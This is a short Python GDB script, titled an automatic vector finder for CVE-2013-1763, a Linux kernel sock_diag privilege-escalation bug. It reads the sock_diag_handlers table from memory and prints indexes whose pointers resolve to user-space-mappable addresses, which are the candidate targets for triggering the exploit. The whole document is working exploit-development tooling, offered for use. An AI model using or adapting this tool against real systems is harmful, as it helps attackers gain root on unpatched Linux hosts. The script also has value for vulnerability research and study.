Automatic vector finder for CVE-2013-1763

1. '''
2. Automatic vector finder for CVE-2013-1763
3.  
4. just feed it the address of sock_diag_handlers ( for count 256 is fine )
5.  
6. ocean  ### https://twitter.com/_ocean
7. '''
8.  
9. import struct
10. import subprocess
11. import re
12. import sys
13. import os
14. import gdb
15.  
16.  
17. def find_location(base,count):
18.  
19.     # define user space upper limit
20.     allf = 0xFFFFFFFF # be sure we do everything unsigned!
21.     mmap_min_addr = 4096
22.     ul = int("0xBF000000",16)
23.     try:
24.         # try to read memory so we get a table of possible pointers
25.         buffer = gdb.inferiors()[0].read_memory(base, count*4)
26.        
27.         for i in range(1,count):
28.             # better if we find a suitable pointer in Kspace
29.             t= struct.unpack('<I',buffer[i*4:i*4+4])[0]
30.             #print t
31.             try:
32.                 if  t&allf> ul&allf:
33.                     t1 = gdb.inferiors()[0].read_memory(t, 4)
34.                     t2 = gdb.inferiors()[0].read_memory(t+4, 4)
35.                     t1 = struct.unpack('<I', t1)[0]
36.                     t2 = struct.unpack('<I', t2)[0]
37.                     if t2&allf >= mmap_min_addr&allf and t2&allf < ul&allf:
38.                         print "["+hex(i)+"] "+hex(base+i*4)+" = "+hex(t1)+"\t"+hex(t2)
39.                 elif t&allf >= mmap_min_addr&allf and t&allf < ul&allf :
40.                     print "possible location in uspace ["+hex(i)+"] "+hex(base+i*4)+" = "+hex(t)
41.  
42.             except gdb.MemoryError as e:
43.                 # it's not a good pointer
44.                 continue
45.         return True
46.     except Exception as e:
47.         print e
48.         return False